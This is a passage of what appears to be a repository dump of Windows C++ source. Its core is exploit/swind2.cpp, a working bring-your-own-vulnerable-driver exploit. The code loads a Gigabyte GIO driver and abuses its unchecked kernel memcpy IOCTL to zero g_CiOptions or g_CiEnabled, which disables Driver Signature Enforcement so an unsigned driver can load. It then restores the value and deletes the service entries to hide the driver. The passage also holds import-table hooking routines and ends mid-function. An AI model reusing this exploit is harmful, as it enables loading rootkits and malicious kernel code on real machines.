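        }
        break;
    }

    return 0;
}
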
//------------------------------------------------------------------------------ 416 | // WinMain 417 | //------------------------------------------------------------------------------ 418 | int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) 419 | { 420 | UNREFERENCED_PARAMETER(hPrevInstance); 421 | UNREFERENCED_PARAMETER(lpCmdLine); 422 | UNREFERENCED_PARAMETER(nCmdShow); 423 | 424 | // zero all global vars 425 | memset(&g,0,sizeof(GLOBALS)); 426 | g.hInstance = hInstance; 427 | 428 | // create dialog box from resource 429 | DialogBoxParam(hInstance,MAKEINTRESOURCE(IDD_DIALOG1),0,MyDlg1DlgProc,0); 430 | 431 | return 0; 432 | } 433 | 434 | -------------------------------------------------------------------------------- /exploit/swind2.cpp: -------------------------------------------------------------------------------- 1 | #include "../global.h" 2 | #include 3 | #include 4 | 5 | #define EQUALS(a, b) (RtlCompareMemory(a, b, sizeof(b) - 1) == (sizeof(b) - 1)) 6 | #define NT_MACHINE L"\\Registry\\Machine\\" 7 | #define SVC_BASE NT_MACHINE L"System\\CurrentControlSet\\Services\\" 8 | 9 | // Gigabyte GIO device name and type, and IOCTL code for memcpy call 10 | #define GIO_DEVICE_NAME L"\\Device\\GIO" 11 | #define FILE_DEVICE_GIO (0xc350) 12 | #define IOCTL_GIO_MEMCPY CTL_CODE(FILE_DEVICE_GIO, 0xa02, METHOD_BUFFERED, FILE_ANY_ACCESS) 13 | 14 | // Input struct for IOCTL_GIO_MEMCPY 15 | typedef struct _GIOMemcpyInput 16 | { 17 | ULONG_PTR Dst; 18 | ULONG_PTR Src; 19 | ULONG Size; 20 | } GIOMemcpyInput, * PGIOMemcpyInput; 21 | 22 | static WCHAR DriverServiceName[MAX_PATH], LoaderServiceName[MAX_PATH]; 23 | 24 | bool CompareByte(const PUCHAR data, const PUCHAR pattern, UINT32 len) 25 | { 26 | for (auto i = 0; i < len; i++) 27 | { 28 | if (data[i] != pattern[i] && pattern[i] != 0) 29 | return false; 30 | } 31 | return true; 32 | } 33 | 34 | static 35 | NTSTATUS 36 | FindKernelModule( 37 | _In_ PCCH ModuleName, 38 | _Out_ 
PULONG_PTR ModuleBase 39 | ) 40 | { 41 | *ModuleBase = 0; 42 | 43 | ULONG Size = 0; 44 | NTSTATUS Status; 45 | if ((Status = NtQuerySystemInformation(SystemModuleInformation, nullptr, 0, &Size)) != STATUS_INFO_LENGTH_MISMATCH) 46 | return Status; 47 | 48 | const PRTL_PROCESS_MODULES Modules = static_cast(RtlAllocateHeap(RtlProcessHeap(), HEAP_ZERO_MEMORY, 2 * static_cast(Size))); 49 | Status = NtQuerySystemInformation(SystemModuleInformation, 50 | Modules, 51 | 2 * Size, 52 | nullptr); 53 | if (!NT_SUCCESS(Status)) 54 | goto Exit; 55 | 56 | for (ULONG i = 0; i < Modules->NumberOfModules; ++i) 57 | { 58 | RTL_PROCESS_MODULE_INFORMATION Module = Modules->Modules[i]; 59 | if (_stricmp(ModuleName, reinterpret_cast(Module.FullPathName) + Module.OffsetToFileName) == 0) 60 | { 61 | *ModuleBase = reinterpret_cast(Module.ImageBase); 62 | Status = STATUS_SUCCESS; 63 | break; 64 | } 65 | } 66 | 67 | Exit: 68 | RtlFreeHeap(RtlProcessHeap(), 0, Modules); 69 | return Status; 70 | } 71 | 72 | 73 | // For Windows Vista/7 74 | static 75 | LONG 76 | QueryCiEnabled( 77 | _In_ PVOID MappedBase, 78 | _In_ SIZE_T SizeOfImage, 79 | _In_ ULONG_PTR KernelBase, 80 | _Out_ PULONG_PTR gCiEnabledAddress 81 | ) 82 | { 83 | *gCiEnabledAddress = 0; 84 | 85 | ULONG_PTR Offset = 0; 86 | 87 | for (SIZE_T i = 0; i < SizeOfImage; i++) 88 | { 89 | if (CompareByte(PUCHAR(MappedBase) + i, (PUCHAR)Pattern_gCiEnabled, 4)) 90 | { 91 | Offset = i; 92 | } 93 | } 94 | if (Offset == 0) 95 | { 96 | printf("failed to find CiEnabled\n"); 97 | return 0; 98 | } 99 | 100 | LONG RealOffset = *reinterpret_cast((ULONG_PTR)MappedBase + Offset + 4); 101 | ULONG_PTR g_CiEnabled = (ULONG_PTR)MappedBase + RealOffset + Offset + 4 + 4; 102 | *gCiEnabledAddress = KernelBase + g_CiEnabled - (ULONG_PTR)MappedBase; 103 | printf("i : 0x%llx\n gCiEnabled : %llx\n gCiEnabledAddress : %llx\n"); 104 | return 1; 105 | } 106 | 107 | 108 | 109 | // For Windows 8 and worse 110 | static 111 | LONG 112 | QueryCiOptions( 113 | _In_ PVOID 
MappedBase, // ci.dll file 114 | _In_ ULONG_PTR KernelBase, //ci.dll kernel base 115 | _Out_ PULONG_PTR gCiOptionsAddress 116 | ) 117 | { 118 | *gCiOptionsAddress = 0; 119 | 120 | UINT64 CiInitializeAddress = (UINT64)GetProcedureAddress(reinterpret_cast(MappedBase), "CiInitialize"); 121 | const PUCHAR CiInitialize = reinterpret_cast(GetProcedureAddress(reinterpret_cast(MappedBase), "CiInitialize")); 122 | if (CiInitialize == nullptr) 123 | return 0; 124 | 125 | int Offset = 0; 126 | UINT16 j = 0; 127 | if (NtCurrentPeb()->OSBuildNumber >= 16299) 128 | { 129 | for (auto i = 0; i < 255; i++) 130 | { 131 | if (CompareByte(PUCHAR(CiInitialize + i), PUCHAR(Pattern_CipInit_1709), 16)) 132 | { 133 | Offset = i; 134 | } 135 | } 136 | for (j = 0; Pattern_CipInit_1709[j]; j++) 137 | ; 138 | } 139 | else 140 | { 141 | for (auto i = 0; i < 255; i++) 142 | { 143 | if (CompareByte(PUCHAR(CiInitialize + i), PUCHAR(Pattern_CipInit), 12)) 144 | { 145 | Offset = i; 146 | } 147 | } 148 | for (j = 0; Pattern_CipInit[j]; j++) 149 | ; 150 | } 151 | if (!Offset) 152 | { 153 | printf("failed to find CipInitialize\n"); 154 | return 0; 155 | } 156 | 157 | ULONG CipInitOffset = *reinterpret_cast(CiInitializeAddress + Offset + j); 158 | ULONG_PTR CipInitialize = CiInitializeAddress + CipInitOffset + Offset + j + 4; 159 | printf("CipOffset : %d, CipInitOffset : 0x%llx, CipInitialize : 0x%llx\n", Offset, CipInitOffset, CipInitialize); 160 | Offset = 0; 161 | j = 0; 162 | 163 | for (auto i = 0; i < 255; i++) 164 | { 165 | 166 | if (CompareByte(PUCHAR(CipInitialize + i), PUCHAR(Pattern_gCiOptions), 12)) 167 | { 168 | Offset = i; 169 | } 170 | } 171 | for (j = 0; Pattern_gCiOptions[j]; j++) 172 | ; 173 | if (!Offset) 174 | { 175 | printf("failed to find Ci_gOptions\n"); 176 | return 0; 177 | } 178 | 179 | 180 | INT32 RealOffset = *reinterpret_cast(CipInitialize + Offset + j); // RVA 181 | UINT64 g_CiOptions = CipInitialize + RealOffset + Offset + j + 4; // Calculate 182 | printf("Offset : %d 
RealOffset : %d g_CiOptions : 0x%llx ", Offset, RealOffset, g_CiOptions); 183 | *gCiOptionsAddress = KernelBase + g_CiOptions - (UINT64)MappedBase; 184 | 185 | return 1; 186 | } 187 | 188 | static 189 | NTSTATUS 190 | AnalyzeCi( 191 | _Out_ PVOID* CiOptionsAddress 192 | ) 193 | { 194 | *CiOptionsAddress = nullptr; 195 | 196 | // Map file as SEC_IMAGE 197 | WCHAR Path[MAX_PATH]; 198 | const CHAR NtoskrnlExe[] = "ntoskrnl.exe"; 199 | const CHAR CiDll[] = "CI.dll"; 200 | 201 | _snwprintf(Path, MAX_PATH / sizeof(WCHAR), L"%ls\\System32\\%hs", 202 | SharedUserData->NtSystemRoot, 203 | NtCurrentPeb()->OSBuildNumber >= 9200 ? CiDll : NtoskrnlExe); 204 | 205 | PVOID MappedBase; 206 | SIZE_T ViewSize; 207 | NTSTATUS Status = MapFileSectionView(Path, FALSE, &MappedBase, &ViewSize); 208 | if (!NT_SUCCESS(Status)) 209 | { 210 | printf("Failed to map %ls: %08X\n", Path, Status); 211 | return Status; 212 | } 213 | 214 | if (NtCurrentPeb()->OSBuildNumber >= 9200) 215 | { 216 | // Find CI.dll!g_CiOptions 217 | ULONG_PTR CiDllBase; 218 | Status = FindKernelModule(CiDll, &CiDllBase); 219 | if (!NT_SUCCESS(Status)) 220 | { 221 | printf("Failed to FindKernelModule %08X\n", Status); 222 | goto Exit; 223 | } 224 | 225 | ULONG_PTR gCiOptionsAddress; 226 | const LONG Rel = QueryCiOptions(MappedBase, CiDllBase, &gCiOptionsAddress); 227 | if (Rel != 0) 228 | { 229 | *CiOptionsAddress = reinterpret_cast(gCiOptionsAddress); 230 | Status = STATUS_SUCCESS; 231 | } 232 | else 233 | { 234 | 235 | Status = STATUS_NOT_FOUND; 236 | } 237 | } 238 | else 239 | { 240 | // Find ntoskrnl.exe!g_CiEnabled 241 | ULONG_PTR KernelBase; 242 | Status = FindKernelModule(NtoskrnlExe, &KernelBase); 243 | if (!NT_SUCCESS(Status)) 244 | goto Exit; 245 | 246 | ULONG_PTR gCiEnabledAddress; 247 | const LONG Rel = QueryCiEnabled(MappedBase, ViewSize, KernelBase, &gCiEnabledAddress); 248 | if (Rel != 0) 249 | { 250 | *CiOptionsAddress = reinterpret_cast(gCiEnabledAddress); 251 | Status = STATUS_SUCCESS; 252 | } 253 | 
else 254 | { 255 | Status = STATUS_NOT_FOUND; 256 | } 257 | } 258 | 259 | Exit: 260 | NtUnmapViewOfSection(NtCurrentProcess, MappedBase); 261 | return Status; 262 | } 263 | 264 | static int ConvertToNtPath(PWCHAR Dst, PWCHAR Src) // TODO: holy shit this is fucking horrible 265 | { 266 | wcscpy_s(Dst, sizeof(L"\\??\\") / sizeof(WCHAR), L"\\??\\"); 267 | wcscat_s(Dst, (MAX_PATH + sizeof(L"\\??\\")) / sizeof(WCHAR), Src); 268 | return static_cast(wcslen(Dst)) * sizeof(wchar_t) + sizeof(wchar_t); 269 | } 270 | 271 | static void FileNameToServiceName(PWCHAR ServiceName, PWCHAR FileName) 272 | { 273 | int p = sizeof(SVC_BASE) / sizeof(WCHAR) - 1; 274 | wcscpy_s(ServiceName, sizeof(SVC_BASE) / sizeof(WCHAR), SVC_BASE); 275 | for (PWCHAR i = FileName; *i; ++i) 276 | { 277 | if (*i == L'\\') 278 | FileName = i + 1; 279 | } 280 | while (*FileName != L'\0' && *FileName != L'.') 281 | ServiceName[p++] = *FileName++; 282 | ServiceName[p] = L'\0'; 283 | } 284 | 285 | static NTSTATUS CreateDriverService(PWCHAR ServiceName, PWCHAR FileName) 286 | { 287 | FileNameToServiceName(ServiceName, FileName); 288 | NTSTATUS Status = RtlCreateRegistryKey(RTL_REGISTRY_ABSOLUTE, ServiceName); 289 | if (!NT_SUCCESS(Status)) 290 | return Status; 291 | 292 | WCHAR NtPath[MAX_PATH]; 293 | ULONG ServiceType = SERVICE_KERNEL_DRIVER; 294 | 295 | Status = RtlWriteRegistryValue(RTL_REGISTRY_ABSOLUTE, 296 | ServiceName, 297 | L"ImagePath", 298 | REG_SZ, 299 | NtPath, 300 | ConvertToNtPath(NtPath, FileName)); 301 | if (!NT_SUCCESS(Status)) 302 | return Status; 303 | 304 | Status = RtlWriteRegistryValue(RTL_REGISTRY_ABSOLUTE, 305 | ServiceName, 306 | L"Type", 307 | REG_DWORD, 308 | &ServiceType, 309 | sizeof(ServiceType)); 310 | return Status; 311 | } 312 | 313 | static void DeleteService(PWCHAR ServiceName) 314 | { 315 | // TODO: shlwapi.dll? 
holy fuck this is horrible 316 | SHDeleteKeyW(HKEY_LOCAL_MACHINE, ServiceName + sizeof(NT_MACHINE) / sizeof(WCHAR) - 1); 317 | } 318 | 319 | static BOOLEAN IsCiEnabled() 320 | { 321 | SYSTEM_CODEINTEGRITY_INFORMATION CiInfo = { sizeof(SYSTEM_CODEINTEGRITY_INFORMATION) }; 322 | const NTSTATUS Status = NtQuerySystemInformation(SystemCodeIntegrityInformation, 323 | &CiInfo, 324 | sizeof(CiInfo), 325 | nullptr); 326 | if (!NT_SUCCESS(Status)) 327 | printf("Failed to query code integrity status: %08X\n", Status); 328 | 329 | return (CiInfo.CodeIntegrityOptions & 330 | (CODEINTEGRITY_OPTION_ENABLED | CODEINTEGRITY_OPTION_TESTSIGN)) == CODEINTEGRITY_OPTION_ENABLED; 331 | } 332 | 333 | static NTSTATUS LoadDriver(PWCHAR ServiceName) 334 | { 335 | UNICODE_STRING ServiceNameUcs; 336 | RtlInitUnicodeString(&ServiceNameUcs, ServiceName); 337 | return NtLoadDriver(&ServiceNameUcs); 338 | } 339 | 340 | static NTSTATUS UnloadDriver(PWCHAR ServiceName) 341 | { 342 | UNICODE_STRING ServiceNameUcs; 343 | RtlInitUnicodeString(&ServiceNameUcs, ServiceName); 344 | return NtUnloadDriver(&ServiceNameUcs); 345 | } 346 | 347 | static 348 | NTSTATUS 349 | OpenDeviceHandle( 350 | _Out_ PHANDLE DeviceHandle, 351 | _In_ BOOLEAN PrintErrors 352 | ) 353 | { 354 | UNICODE_STRING DeviceName = RTL_CONSTANT_STRING(GIO_DEVICE_NAME); 355 | OBJECT_ATTRIBUTES ObjectAttributes = RTL_CONSTANT_OBJECT_ATTRIBUTES(&DeviceName, OBJ_CASE_INSENSITIVE); 356 | IO_STATUS_BLOCK IoStatusBlock; 357 | 358 | const NTSTATUS Status = NtCreateFile(DeviceHandle, 359 | SYNCHRONIZE, // Yes, these really are the only access rights needed. 
(actually would be 0, but we want SYNCHRONIZE to wait on NtDeviceIoControlFile) 360 | &ObjectAttributes, 361 | &IoStatusBlock, 362 | nullptr, 363 | FILE_ATTRIBUTE_NORMAL, 364 | FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, 365 | FILE_OPEN, 366 | FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, 367 | nullptr, 368 | 0); 369 | 370 | if (!NT_SUCCESS(Status) && PrintErrors) // The first open is expected to fail; don't spam the user about it 371 | printf("Failed to obtain handle to device %wZ: NtCreateFile: %08X.\n", &DeviceName, Status); 372 | 373 | return Status; 374 | } 375 | 376 | static 377 | NTSTATUS 378 | TriggerExploit( 379 | _In_ PWSTR LoaderServiceName, 380 | _In_ PVOID CiVariableAddress, 381 | _In_ ULONG CiOptionsValue, 382 | _Out_opt_ PULONG OldCiOptionsValue 383 | ) 384 | { 385 | if (OldCiOptionsValue != nullptr) 386 | *OldCiOptionsValue = 0; 387 | 388 | // First try to open the device without loading the driver. This only works if it was already loaded 389 | HANDLE DeviceHandle; 390 | NTSTATUS Status = OpenDeviceHandle(&DeviceHandle, FALSE); 391 | if (!NT_SUCCESS(Status)) 392 | { 393 | // Load the Gigabyte loader driver 394 | Status = LoadDriver(LoaderServiceName); 395 | if (!NT_SUCCESS(Status)) 396 | { 397 | printf("Failed to load driver service %ls. NtLoadDriver: %08X.\n", LoaderServiceName, Status); 398 | return Status; 399 | } 400 | 401 | // The device should exist now. If we still can't open it, bail 402 | Status = OpenDeviceHandle(&DeviceHandle, TRUE); 403 | if (!NT_SUCCESS(Status)) 404 | return Status; 405 | } 406 | 407 | // Number of bytes to read/write: 1 on Windows 7, 4 on lesser OSes 408 | const ULONG CiPatchSize = NtCurrentPeb()->OSBuildNumber >= 9200 ? 
sizeof(ULONG) : sizeof(UCHAR); 409 | const UCHAR CiOptionsValueByte = static_cast(CiOptionsValue); 410 | 411 | GIOMemcpyInput MemcpyInput; 412 | IO_STATUS_BLOCK IoStatusBlock; 413 | 414 | if (OldCiOptionsValue != nullptr) // Only perform this read if the original value was requested 415 | { 416 | // Set up memcpy input for a read operation 417 | ULONG OldCiOptions = 0; 418 | MemcpyInput.Dst = reinterpret_cast(&OldCiOptions); 419 | MemcpyInput.Src = reinterpret_cast(CiVariableAddress); 420 | MemcpyInput.Size = CiPatchSize; 421 | 422 | // IOCTL (1): Read the current value of g_CiEnabled/g_CiOptions so we can restore it later 423 | Status = NtDeviceIoControlFile(DeviceHandle, 424 | nullptr, 425 | nullptr, 426 | nullptr, 427 | &IoStatusBlock, 428 | IOCTL_GIO_MEMCPY, 429 | &MemcpyInput, 430 | sizeof(MemcpyInput), 431 | nullptr, 432 | 0); 433 | if (!NT_SUCCESS(Status)) 434 | { 435 | printf("NtDeviceIoControlFile(IOCTL_GIO_MEMCPY) *READ* failed: error %08X\n", Status); 436 | goto Exit; 437 | } 438 | 439 | // Use the out parameter to return the previous value of g_CiOptions 440 | *OldCiOptionsValue = OldCiOptions; 441 | } 442 | 443 | // Set up memcpy input a second time, this time for writing 444 | MemcpyInput.Dst = reinterpret_cast(CiVariableAddress); 445 | MemcpyInput.Src = CiPatchSize == sizeof(ULONG) 446 | ? 
reinterpret_cast(&CiOptionsValue) 447 | : reinterpret_cast(&CiOptionsValueByte); 448 | MemcpyInput.Size = CiPatchSize; 449 | 450 | // IOCTL (2): Use the driver IOCTL's juicy memcpy that performs zero access checks to write the desired value to the kernel address 451 | RtlZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock)); 452 | Status = NtDeviceIoControlFile(DeviceHandle, 453 | nullptr, 454 | nullptr, 455 | nullptr, 456 | &IoStatusBlock, 457 | IOCTL_GIO_MEMCPY, 458 | &MemcpyInput, 459 | sizeof(MemcpyInput), 460 | nullptr, 461 | 0); 462 | if (!NT_SUCCESS(Status)) 463 | printf("NtDeviceIoControlFile(IOCTL_GIO_MEMCPY) *WRITE* failed: error %08X\n", Status); 464 | 465 | Exit: 466 | NtClose(DeviceHandle); 467 | 468 | return Status; 469 | } 470 | 471 | NTSTATUS 472 | WindLoadDriver( 473 | _In_ PWCHAR LoaderName, 474 | _In_ PWCHAR DriverName, 475 | _In_ BOOLEAN Hidden 476 | ) 477 | { 478 | WCHAR LoaderPath[MAX_PATH], DriverPath[MAX_PATH]; 479 | 480 | // Find CI!g_CiOptions/nt!g_CiEnabled 481 | PVOID CiOptionsAddress; 482 | NTSTATUS Status = AnalyzeCi(&CiOptionsAddress); 483 | if (!NT_SUCCESS(Status)) 484 | return Status; 485 | 486 | printf("%ls at 0x%p.\n", (NtCurrentPeb()->OSBuildNumber >= 9200 ? L"CI!g_CiOptions" : L"nt!g_CiEnabled"), CiOptionsAddress); 487 | 488 | // Enable privileges 489 | CONSTEXPR CONST ULONG SE_LOAD_DRIVER_PRIVILEGE = 10UL; 490 | BOOLEAN SeLoadDriverWasEnabled; 491 | Status = RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, 492 | TRUE, 493 | FALSE, 494 | &SeLoadDriverWasEnabled); 495 | 496 | if (!NT_SUCCESS(Status)) 497 | { 498 | printf("Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. 
Make sure you are running as administrator.\n"); 499 | return Status; 500 | } 501 | 502 | // Expand filenames to full paths 503 | //Status = RtlGetFullPathName_UEx(LoaderName, MAX_PATH * sizeof(WCHAR), LoaderPath, nullptr, nullptr); 504 | //if (!NT_SUCCESS(Status)) 505 | // return Status; 506 | Status = RtlGetFullPathName_UEx(DriverName, MAX_PATH * sizeof(WCHAR), DriverPath, nullptr, nullptr); 507 | if (!NT_SUCCESS(Status)) 508 | return Status; 509 | 510 | // Create the target driver service 511 | Status = CreateDriverService(DriverServiceName, DriverPath); 512 | if (!NT_SUCCESS(Status)) 513 | return Status; 514 | 515 | if (true) 516 | { 517 | // CI is already disabled, just load the driver 518 | printf("WARNING: CI is already disabled!\n"); 519 | return LoadDriver(DriverServiceName); 520 | } 521 | 522 | // Create the loader driver service 523 | Status = CreateDriverService(LoaderServiceName, LoaderPath); 524 | if (!NT_SUCCESS(Status)) 525 | return Status; 526 | 527 | // Disable CI 528 | ULONG OldCiOptionsValue; 529 | Status = TriggerExploit(LoaderServiceName, CiOptionsAddress, 0, &OldCiOptionsValue); 530 | if (!NT_SUCCESS(Status)) 531 | { 532 | printf("Failed to disable DSE through Gigabyte loader driver: %08X\n", Status); 533 | goto Exit; 534 | } 535 | 536 | printf("Successfully disabled DSE."); 537 | if (NtCurrentPeb()->OSBuildNumber >= 9200) 538 | { 539 | printf(" Original g_CiOptions value: 0x%X.", OldCiOptionsValue); 540 | } 541 | printf("\n"); 542 | 543 | // Load target driver 544 | Status = LoadDriver(DriverServiceName); 545 | 546 | if (!NT_SUCCESS(Status)) 547 | { 548 | if (Status == STATUS_IMAGE_ALREADY_LOADED) 549 | { 550 | // Already loaded - attempt to reload 551 | Status = UnloadDriver(DriverServiceName); 552 | if (!NT_SUCCESS(Status)) 553 | printf("Target driver is already loaded, and unloading failed with status %08X\n", Status); 554 | else 555 | { 556 | Status = LoadDriver(DriverServiceName); 557 | if (!NT_SUCCESS(Status)) 558 | printf("Failed to 
reload target driver: %08X\n", Status); 559 | else 560 | printf("Succesfully reloaded target driver.\n"); 561 | } 562 | } 563 | else 564 | printf("Failed to load target driver: %08X\n", Status); 565 | } 566 | else 567 | { 568 | printf("Target driver loaded successfully.\n"); 569 | } 570 | 571 | // Reset original CI status 572 | Status = TriggerExploit(LoaderServiceName, CiOptionsAddress, OldCiOptionsValue, nullptr); 573 | if (!NT_SUCCESS(Status)) 574 | { 575 | printf("WARNING: failed to re-enable DSE through Gigabyte loader driver: %08X\n", Status); 576 | Status = STATUS_SUCCESS; // Don't DeleteService() the target driver in the error path below; we are past the point of no return 577 | } 578 | else 579 | { 580 | printf("Successfully re-enabled DSE.\n"); 581 | } 582 | 583 | // Unload the loader driver since we are done with it 584 | UnloadDriver(LoaderServiceName); 585 | DeleteService(LoaderServiceName); 586 | 587 | Exit: 588 | if (!NT_SUCCESS(Status) || Hidden) 589 | DeleteService(DriverServiceName); 590 | 591 | // Revert privileges 592 | RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, 593 | SeLoadDriverWasEnabled, 594 | FALSE, 595 | &SeLoadDriverWasEnabled); 596 | 597 | return Status; 598 | } 599 | 600 | NTSTATUS 601 | WindUnloadDriver( 602 | _In_ PWCHAR DriverName, 603 | _In_ BOOLEAN Hidden 604 | ) 605 | { 606 | CONSTEXPR CONST ULONG SE_LOAD_DRIVER_PRIVILEGE = 10UL; 607 | BOOLEAN SeLoadDriverWasEnabled; 608 | NTSTATUS Status = RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, 609 | TRUE, 610 | FALSE, 611 | &SeLoadDriverWasEnabled); 612 | if (!NT_SUCCESS(Status)) 613 | return Status; 614 | 615 | if (DriverName != nullptr && Hidden) 616 | CreateDriverService(DriverServiceName, DriverName); 617 | 618 | FileNameToServiceName(DriverServiceName, DriverName); 619 | 620 | Status = UnloadDriver(DriverServiceName); 621 | if (NT_SUCCESS(Status) || Hidden) 622 | DeleteService(DriverServiceName); 623 | 624 | RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, 625 | SeLoadDriverWasEnabled, 
626 | FALSE, 627 | &SeLoadDriverWasEnabled); 628 | 629 | return Status; 630 | } 631 | -------------------------------------------------------------------------------- /NOP/worker/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "WebView2.h" 9 | #include "WebView2EnvironmentOptions.h" 10 | 11 | #pragma region "IAT patching routine" 12 | // https://blog.neteril.org/blog/2016/12/23/diverting-functions-windows-iat-patching/ 13 | inline bool VnPatchIAT(HMODULE hMod, const char* libName, const char* funcName, uintptr_t hookAddr) { 14 | // Increment module reference count to prevent other threads from unloading it while we're working with it 15 | HMODULE module; 16 | if (!::GetModuleHandleExW(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, (LPCWSTR)hMod, &module)) return false; 17 | 18 | // Get a reference to the import table to locate the kernel32 entry 19 | PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)module; 20 | PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((uintptr_t)module + dos->e_lfanew); 21 | PIMAGE_IMPORT_DESCRIPTOR importDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((uintptr_t)module + 22 | nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); 23 | 24 | // In the import table find the entry that corresponds to kernel32 25 | bool found = false; 26 | while (importDescriptor->Characteristics && importDescriptor->Name) { 27 | PSTR importName = (PSTR)((PBYTE)module + importDescriptor->Name); 28 | if (::_stricmp(importName, libName) == 0) { found = true; break; } 29 | importDescriptor++; 30 | } 31 | if (!found) { ::FreeLibrary(module); return false; } 32 | 33 | // From the kernel32 import descriptor, go over its IAT thunks to 34 | // find the one used by the rest of the code to call GetProcAddress 35 | PIMAGE_THUNK_DATA oldthunk = (PIMAGE_THUNK_DATA)((PBYTE)module + importDescriptor->OriginalFirstThunk); 36 | 
PIMAGE_THUNK_DATA thunk = (PIMAGE_THUNK_DATA)((PBYTE)module + importDescriptor->FirstThunk); 37 | while (thunk->u1.Function) { 38 | PROC* funcStorage = (PROC*)&thunk->u1.Function; 39 | 40 | bool bFound = false; 41 | if (oldthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) { 42 | bFound = (!(*((WORD*)&(funcName)+1)) && IMAGE_ORDINAL32(oldthunk->u1.Ordinal) == (DWORD_PTR)funcName); 43 | } 44 | else { 45 | PIMAGE_IMPORT_BY_NAME byName = (PIMAGE_IMPORT_BY_NAME)((uintptr_t)module + oldthunk->u1.AddressOfData); 46 | bFound = ((*((WORD*)&(funcName)+1)) && !::_stricmp((char*)byName->Name, funcName)); 47 | } 48 | 49 | // Found it, now let's patch it 50 | if (bFound) { 51 | // Get the memory page where the info is stored 52 | MEMORY_BASIC_INFORMATION mbi; 53 | ::VirtualQuery(funcStorage, &mbi, sizeof(MEMORY_BASIC_INFORMATION)); 54 | 55 | // Try to change the page to be writable if it's not already 56 | if (!::VirtualProtect(mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect)) { 57 | ::FreeLibrary(module); 58 | return false; 59 | } 60 | 61 | // Store our hook 62 | *funcStorage = (PROC)hookAddr; 63 | 64 | // Restore the old flag on the page 65 | DWORD dwOldProtect; 66 | ::VirtualProtect(mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect); 67 | 68 | // Profit 69 | ::FreeLibrary(module); 70 | return true; 71 | } 72 | 73 | thunk++; 74 | oldthunk++; 75 | } 76 | 77 | ::FreeLibrary(module); 78 | return false; 79 | } 80 | 81 | inline BOOL VnPatchDelayIAT(HMODULE hMod, const char* libName, const char* funcName, uintptr_t hookAddr) { 82 | // Increment module reference count to prevent other threads from unloading it while we're working with it 83 | HMODULE lib; 84 | if (!GetModuleHandleExW(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, (LPCWSTR)hMod, &lib)) return FALSE; 85 | 86 | PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)lib; 87 | PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((uintptr_t)lib + dos->e_lfanew); 88 | PIMAGE_DELAYLOAD_DESCRIPTOR dload = 
(PIMAGE_DELAYLOAD_DESCRIPTOR)((uintptr_t)lib + 89 | nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress); 90 | while (dload->DllNameRVA) 91 | { 92 | char* dll = (char*)((uintptr_t)lib + dload->DllNameRVA); 93 | if (!_stricmp(dll, libName)) { 94 | #ifdef _LIBVALINET_DEBUG_HOOKING_IATPATCH 95 | printf("[PatchDelayIAT] Found %s in IAT.\n", libName); 96 | #endif 97 | 98 | PIMAGE_THUNK_DATA firstthunk = (PIMAGE_THUNK_DATA)((uintptr_t)lib + dload->ImportNameTableRVA); 99 | PIMAGE_THUNK_DATA functhunk = (PIMAGE_THUNK_DATA)((uintptr_t)lib + dload->ImportAddressTableRVA); 100 | while (firstthunk->u1.AddressOfData) 101 | { 102 | if (firstthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) 103 | { 104 | if (!(*((WORD*)&(funcName)+1)) && IMAGE_ORDINAL32(firstthunk->u1.Ordinal) == (DWORD_PTR)funcName) 105 | { 106 | DWORD oldProtect; 107 | if (VirtualProtect(&functhunk->u1.Function, sizeof(uintptr_t), PAGE_EXECUTE_READWRITE, &oldProtect)) 108 | { 109 | functhunk->u1.Function = (uintptr_t)hookAddr; 110 | VirtualProtect(&functhunk->u1.Function, sizeof(uintptr_t), oldProtect, &oldProtect); 111 | #ifdef _LIBVALINET_DEBUG_HOOKING_IATPATCH 112 | printf("[PatchDelayIAT] Patched 0x%x in %s to 0x%p.\n", funcName, libName, hookAddr); 113 | #endif 114 | FreeLibrary(lib); 115 | return TRUE; 116 | } 117 | FreeLibrary(lib); 118 | return FALSE; 119 | } 120 | } 121 | else 122 | { 123 | PIMAGE_IMPORT_BY_NAME byName = (PIMAGE_IMPORT_BY_NAME)((uintptr_t)lib + firstthunk->u1.AddressOfData); 124 | if ((*((WORD*)&(funcName)+1)) && !_stricmp((char*)byName->Name, funcName)) 125 | { 126 | DWORD oldProtect; 127 | if (VirtualProtect(&functhunk->u1.Function, sizeof(uintptr_t), PAGE_EXECUTE_READWRITE, &oldProtect)) 128 | { 129 | functhunk->u1.Function = (uintptr_t)hookAddr; 130 | VirtualProtect(&functhunk->u1.Function, sizeof(uintptr_t), oldProtect, &oldProtect); 131 | #ifdef _LIBVALINET_DEBUG_HOOKING_IATPATCH 132 | printf("[PatchDelayIAT] Patched %s in %s to 0x%p.\n", funcName, libName, 
